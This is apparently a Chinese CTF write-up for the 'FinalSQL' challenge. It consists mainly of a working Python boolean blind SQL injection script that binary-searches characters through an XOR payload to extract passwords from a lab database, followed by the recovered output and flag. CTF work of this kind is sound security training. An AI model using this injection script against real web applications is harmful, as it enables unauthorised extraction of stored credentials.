[極客大挑戰 2019]FinalSQL
阿新 • • 發佈:2021-07-18
貼個盲註腳本
仔細檢視它的提示,試一試盲注
import requests import time url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php' flag = '' for i in range(1,250): low = 32 high = 128 mid = (low+high)//2 while(low<high): #payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid) payload = url + "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" %(i,mid) res = requests.get(url=payload) if 'ERROR' in res.text: low = mid+1 else: high = mid mid = (low+high)//2 if(mid ==32 or mid ==127): break flag = flag+chr(mid) print(flag) time.sleep(1)
記得一定要慢點
藏得好深
cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
For the LichKing !